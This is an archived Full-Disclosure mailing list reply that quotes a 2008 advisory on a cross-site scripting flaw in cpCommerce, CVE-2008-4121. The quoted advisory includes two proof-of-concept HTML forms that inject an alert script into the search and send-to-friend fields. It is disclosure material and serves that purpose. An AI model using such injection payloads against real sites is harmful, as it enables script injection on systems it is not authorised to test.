[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce, CVE-2008-4121

To: Fabian Fingerle <fabian@xxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce, CVE-2008-4121
From: rholgstad <rholgstad@xxxxxxxxx>
Date: Mon, 20 Oct 2008 10:31:45 -0500

No one cares about cross site scripting

Fabian Fingerle wrote:
> Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce,
> CVE-2008-4121 
>
> References
>
> http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
> http://cpcommerce.cpradio.org/
>
> Description
>
> cpCommerce is an open-source e-commerce solution that is maintained by
> templates and modules. 
>
> Example
>
> Assuming cpcommerce is installed on http://localhost/cpcommerce/,
> anybody could inject JavaScript:
>
> <form method="post" action="http://localhost/cpcommerce/search.php";>
> <input type="hidden" name="action" value="search.quick">
> <input type="text" name="search" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> <form method="post" action="http://localhost/cpcommerce/sendtofriend.php";> 
> <input
> type="hidden" name="action" value="sendtofriend"> 
> <input type="text" name="name" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> Disclosure Timeline
>
> 2008-09-23 Vendor contacted
> 2008-09-23 Vendor released 1.2.4
> 2008-10-19 Published advisory
>
> CVE Information
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2008-4121 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org/), which standardizes names for
> security problems. 
>
> Credits and copyright
>
> This vulnerability was discovered by Fabian Fingerle (published with
> help from Hanno Boeck [0]). It's licensed under the creative commons
> attribution license.
>
> Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de
>
> [0] http://www.hboeck.de
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce, CVE-2008-4121
  - From: Fabian Fingerle

Prev by Date: [Full-disclosure] all your keyboards are belong to us!
Next by Date: [Full-disclosure] London DEFCON meet - DC4420 - Thursday October 23rd
Previous by thread: [Full-disclosure] Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce, CVE-2008-4121
Next by thread: [Full-disclosure] Secunia Research: HP SiteScope SNMP Trap Script Insertion Vulnerability
Index(es):
- Date
- Thread